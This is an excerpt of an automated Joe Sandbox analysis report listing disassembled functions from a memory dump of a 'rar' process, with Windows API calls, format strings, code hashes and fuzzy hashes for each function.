                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: wcschr$BeepMessage
                                                            • String ID: ($[%c]%ls
                                                            • API String ID: 1408639281-228076469
                                                            • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                            • Instruction ID: cc12a99d203a259e41657c1cb060e535d71ef7b7686ab4bcb81bfd4a5a2f76b6
                                                            • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                            • Instruction Fuzzy Hash: A981C432A1CE4182EE60EF15E4402BAE7A0FB84B98F940035EA5E47759FF7CE549CB10
                                                            Function 00007FF71D2D6FE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                            • API String ID: 233258989-622958660
                                                            • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                            • Instruction ID: ac8539bf93731dd87bc053c5acd49409a96c7693653031637f4456a539aecff4
                                                            • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                            • Instruction Fuzzy Hash: 585150F3F3C9848AE7544F1CE841BA96650F364BA1F945A28F55A93B84D63DDB488B00
                                                            Function 00007FF71D2C6E84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: wcschr
                                                            • String ID: MCAOmcao$MCAOmcao
                                                            • API String ID: 1497570035-1725859250
                                                            • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                            • Instruction ID: 61a86fea804ad8d4239bbcf60dfcefd08012dc4fc821e5ffc7fc0d55fe98f77f
                                                            • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                            • Instruction Fuzzy Hash: F6419212D1CD8380FA30BB2045515BED251AF50BA4FD84435EA7E062E6FE2DF859DB31
                                                            Function 00007FF71D2D3528 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32 ref: 00007FF71D2D359E
                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF71D2D35E6
                                                              • Part of subcall function 00007FF71D2D30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF71D2D305D,?,?,?,?,?,?,?,?,00007FF71D2E4126,?,?,?,?,00000800), ref: 00007FF71D2D30F0
                                                              • Part of subcall function 00007FF71D2D30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF71D2E4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF71D2D3119
                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF71D2D3651
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AttributesFileswprintf$CurrentProcess
                                                            • String ID: %u.%03u
                                                            • API String ID: 2814246642-1114938957
                                                            • Opcode ID: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                            • Instruction ID: e9ecc64947147cbd1e98ed2542f980ee1ac0b249e66ae134e82cc865f8f93f76
                                                            • Opcode Fuzzy Hash: e27f4123eac550de387ce715d86f3e0140f09c324c71f229c6d48add99db66ae
                                                            • Instruction Fuzzy Hash: 17314B72A1CD8181E614AB24E5112AAE260F7847B4F901335E97E47BE1FE3CE50ECB10
                                                            Function 00007FF71D317854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                            • String ID: U
                                                            • API String ID: 2456169464-4171548499
                                                            • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                            • Instruction ID: ed98cdbc0cdb40eacc792d559ed49051fd3e05c0d80608bb202a93edbf6ee91d
                                                            • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                            • Instruction Fuzzy Hash: CF41A272B1CA46C2DB21AF25E4443AAE7A1FB887A4F844035EE4D87784EF3CD449CB50
                                                            Function 00007FF71D30D7BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                            • String ID: csm
                                                            • API String ID: 2280078643-1018135373
                                                            • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                            • Instruction ID: 9647174405b56f0ee2e75de464c098f30639368137eb9bc994511dcfbd6bc7f8
                                                            • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                            • Instruction Fuzzy Hash: 0E21097A608A41C2E630AB15E04466EF7A1F788BB5F445239DE9D03B95DF3CE449CB20
                                                            Function 00007FF71D2E42CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: wcschr$swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1303626722-3142399695
                                                            • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                            • Instruction ID: 4e934c8a73f5f13b05cf1273325e460815e2d2630b503b5a2eb4b41f301879a9
                                                            • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                            • Instruction Fuzzy Hash: 71116362A0CB4581EE247F119541069E371AF49BE0BA88535DF6E137D7FF3CE46A8610
                                                            Function 00007FF71D2FB780 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                            • Instruction ID: ec18620cd70899fccfbbac2095304bf2a50f3069497fe474df21d8eca64673bc
                                                            • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                            • Instruction Fuzzy Hash: 9111DA32F19A4182F7509F25E4043A9B2A3EBD4BA8F588439CA4D07655EF3D945A8B50
                                                            Function 00007FF71D302984 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                            • String ID:
                                                            • API String ID: 904936192-0
                                                            • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                            • Instruction ID: 2dff037f2c89b74a30a270817ec26321538c7ed0349a613262083369ed70632f
                                                            • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                            • Instruction Fuzzy Hash: B451D176A09A81C5EB50DF29D4903ACF3A1FB84BA4F848235DE5E47794EF78D119CB20
                                                            Function 00007FF71D2D3818 Relevance: 6.1, APIs: 4, Instructions: 129filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF71D2CF6FC,00000000,?,?,?,?,00007FF71D2D097D), ref: 00007FF71D2D38CD
                                                            • CreateFileW.KERNEL32(?,?,?,?,?,00007FF71D2CF6FC,00000000,?,?,?,?,00007FF71D2D097D,?,?,00000000), ref: 00007FF71D2D391F
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00007FF71D2CF6FC,00000000,?,?,?,?,00007FF71D2D097D,?,?,00000000), ref: 00007FF71D2D399B
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00007FF71D2CF6FC,00000000,?,?,?,?,00007FF71D2D097D,?,?,00000000), ref: 00007FF71D2D39A6
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                            • Instruction ID: a27bfc952e0d4b0e709a3ef46a44b4372ac86a00d0a47031c163d30024f17614
                                                            • Opcode Fuzzy Hash: 0a327b2a7523b8e5a310518f0a830a7805d181ea89bccec3bccf2ebd6ae125d4
                                                            • Instruction Fuzzy Hash: 2A41C433A0CE4142EA50AB51E4217BAE6A1BB857B4F904235EEAD477D4FE7CD40D8F10
                                                            Function 00007FF71D300244 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 932687459-0
                                                            • Opcode ID: 9dd97df182f14c0727483b3e7253ad47afb665d8a3a098e21309c6c8203fd826
                                                            • Instruction ID: a3aa9ba7b62b6585ecb0f8d71e028f54e9899b959c04e0b9e165b7fb2a963ff5
                                                            • Opcode Fuzzy Hash: 9dd97df182f14c0727483b3e7253ad47afb665d8a3a098e21309c6c8203fd826
                                                            • Instruction Fuzzy Hash: A641C471A0CED2C5EB61BA20D0503BDE394EB44BA4F98443ADB4D06A99EF6CE4498730
                                                            Function 00007FF71D315120 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 4141327611-0
                                                            • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                            • Instruction ID: 59a6b5a73e684288661be41c4daf8a490b133ff5d4f1c93d5954db948c73563f
                                                            • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                            • Instruction Fuzzy Hash: 3341533290DB43C6FB66AB519440379E6A1AF40BB0F984139DA49466D5EF2CE449CF20
                                                            Function 00007FF71D2CD048 Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,00007FF71D2B86CB,?,?,?,00007FF71D2BA5CB,?,?,00000000,?,?,00000040,?,?,00007FF71D2B2DF9), ref: 00007FF71D2CD09D
                                                            • CreateFileW.KERNEL32(?,00007FF71D2B86CB,?,?,?,00007FF71D2BA5CB,?,?,00000000,?,?,00000040,?,?,00007FF71D2B2DF9), ref: 00007FF71D2CD0E5
                                                            • CreateFileW.KERNEL32(?,00007FF71D2B86CB,?,?,?,00007FF71D2BA5CB,?,?,00000000,?,?,00000040,?,?,00007FF71D2B2DF9), ref: 00007FF71D2CD114
                                                            • CreateFileW.KERNEL32(?,00007FF71D2B86CB,?,?,?,00007FF71D2BA5CB,?,?,00000000,?,?,00000040,?,?,00007FF71D2B2DF9), ref: 00007FF71D2CD15C
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                            • Instruction ID: 28135bfcfff4cd3fa45d96432e05821daa75961e0de84a5cc87b23f677eb57f6
